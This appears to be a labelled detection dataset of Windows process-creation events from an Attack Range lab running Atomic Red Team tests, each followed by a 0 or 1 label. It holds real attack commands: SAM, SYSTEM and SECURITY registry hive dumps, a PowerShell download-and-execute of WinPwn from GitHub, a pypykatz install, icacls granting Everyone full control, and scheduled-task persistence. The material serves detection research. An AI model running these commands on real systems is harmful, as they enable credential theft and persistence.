cmd.exe C:\Windows\System32\cmd.exe /c ""%programfiles%/WinRAR/Rar.exe" a -r %USERPROFILE%\T1560.001-data.rar %USERPROFILE%\*.txt" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "net.exe start spooler >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
attrib.exe C:\Windows\System32\attrib.exe +h C:\Users\ADMINI~1\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib1.txt C:\Windows\System32\attrib.exe +h C:\Users\ADMINI~1\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib2.txt C:\Windows\System32\cmd.exe ar-win-2.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe ngen.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" RemoveTaskDelayStartTrigger /LegacyServiceBehavior
0
attrib.exe attrib.exe +h C:\Users\ADMINI~1\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib1.txt attrib.exe +h C:\Users\ADMINI~1\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib2.txt "cmd.exe" /c "mkdir %temp%\T1222.001_attrib_2 >nul 2>&1 & echo T1222.001_attrib1 >> %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt & echo T1222.001_attrib2 >> %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt & attrib.exe +h %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt & attrib.exe +h %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt" ar-win-dc.attackrange.local Administrator
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe taskhostw.exe C:\Windows\System32\taskhostw.exe
0
cmd.exe "cmd.exe" /c "rmdir /s /Q C:\AtomicRedTeam\atomics\T1560.001\victim-files >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES919E.tmp" "c:\Users\Administrator\AppData\Local\Temp\qtwax1xj\CSCB3DBC51C735E42EDB4C5E3FFA775F54.TMP"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
0
ar-win-2.attackrange.local Administrator "powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') samfile -consoleoutput -noninteractive} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe XblGameSaveTask.exe "C:\Windows\System32\XblGameSaveTask.exe" standby
0
cmd.exe C:\Windows\System32\cmd.exe /c "net.exe stop spooler" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme" splunkd.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"
0
cmd.exe C:\Windows\System32\cmd.exe /c "reg.exe save hklm\sam C:\Users\ADMINI~1\AppData\Local\Temp\bswdowwkvja" WinCreds.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "reg.exe save hklm\sam C:\Users\ADMINI~1\AppData\Local\Temp\cpkcnqsq" WinCreds.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "mkdir .\tmp\victim-files & cd .\tmp\victim-files & echo "This file will be encrypted" > .\encrypted_file.txt & "%%programfiles%%/WinRAR/Rar.exe" a -hp"blue" hello.rar & dir" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe cmd.exe C:\Windows\system32\cmd.exe /c btool server list watchdog --no-log
0
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\aob4sqd3.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES346A.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCD1B090FFD8A744F49F7B10784B63CE77.TMP"
0
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd.exe "C:\Windows\system32\cmd.exe" /c "pypykatz -h >nul 2>&1 && exit /b %errorlevel%"
0
cmd.exe C:\Windows\System32\cmd.exe /c "icacls "C:\Users\Public\*" /grant Everyone:F /T /C /Q" powershell.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "mkdir %%temp%%\T1222.001_takeown_folder & echo T1222.001_takeown1 >> %%temp%%\T1222.001_takeown_folder\T1222.001_takeown1.txt & echo T1222.001_takeown2 >> %%temp%%\T1222.001_takeown_folder\T1222.001_takeown2.txt" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== cmd.exe "cmd.exe" /c "reg save HKLM\sam %%temp%%\sam & reg save HKLM\system %%temp%%\system & reg save HKLM\security %%temp%%\security"
0
cmd.exe C:\Windows\System32\cmd.exe /c "attrib.exe -r %temp%\T1222.001_attrib\*.* /s" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\be0epwcq\be0epwcq.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESC8AC.tmp" "c:\Users\Administrator\AppData\Local\Temp\be0epwcq\CSC74116B0E7C98457C9449EEF649D82BF.TMP"
0
cmd.exe "cmd.exe" /c "at 13:20 /interactive cmd" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Python311\python.exe" "C:\Python311\Scripts\pip.exe" install pypykatz cmd.exe C:\Windows\system32\cmd.exe /c "ver"
0